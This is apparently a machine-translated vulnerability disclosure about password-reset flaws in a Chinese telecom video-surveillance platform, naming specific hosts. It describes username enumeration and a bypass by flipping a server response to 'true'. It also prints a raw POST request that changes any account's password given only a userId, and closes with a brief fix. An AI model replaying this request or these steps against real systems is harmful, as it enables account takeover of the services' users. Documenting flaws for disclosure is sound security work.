Any password reset for the general security business of a system integration service provider of China Telecom ?)

Any password reset for the general security business of a system integration service provider of China Telecom ?)

Believe it or not?

 

Http://www.jsict.com/Jiangsu hongxin System Integration Co., Ltd.

Product: Tianyi Shopping Mall

Tianyi taobaodian is a security service that integrates camera, video, real-time monitoring, cloud platform control, alarm, and storage, for companies, stores, and other places that require visual management, remote monitoring is achieved through client management software and Internet service platforms using computers and smart phones as media, it helps users perform better security and visual management.

Examples:

Http://www.pinganyun.cn: 8000/jsp/findPassword/login: // ha.kandian.189.cn: 8000/jsp/findPassword/login: // www.189eyes.com: 8000/jsp/findPassword/login: // sjkd.online.cq.cn: 8000/jsp/findPassword/findPasswordSetp1.action

First let's look at http://ha.kandian.189.cn: 8000

Beijing, Jiangsu, Tianjin, Hunan, Henan, Shanxi, Xinjiang, Anshan, 8 regions are in use
 

Http://ha.kandian.189.cn: 8000/jsp/findPassword/findPasswordSetp1.action to retrieve the password can still enumerate the user name, here to retrieve "fan" for example

Small design flaws, which leak users' mobile phones

Change Response to true

 

 

Fan: wooyuntest1. Check whether the modification is successful. What will happen after logging on to the system? Who is the real fear of the government and enterprise center ..

There is also a second arbitrary Password Change

POST/jsp/findPassword/savePassword. action HTTP/1.1

Host: ha.kandian.189.cn:8000Proxy-Connection: keep-aliveContent-Length: 60Accept: */*Origin: http://ha.kandian.189.cn:8000X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://ha.kandian.189.cn:8000/jsp/findPassword/findPasswordSetp3.actionAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: userId=4ae6eca743574c98014366b5258d0d17&password=wooyuntest1

You only need to obtain the userId parameter to modify the password of any account.

Then construct the Post and directly change the password.

Ping An cloud has tested the following methods:

As for why I think it is universal, first of all http://sjkd.online.cq.cn: 8000 with http://ha.kandian.189.cn: 8000 tested users are not universal, online.cq.cn Baidu is Chongqing hotline, copyright is the Telecommunications Branch of Chongqing http://www.pinganyun.cn: 8000 Ping An cloud does not know. Users are not universal.

 

Solution:Enhanced verification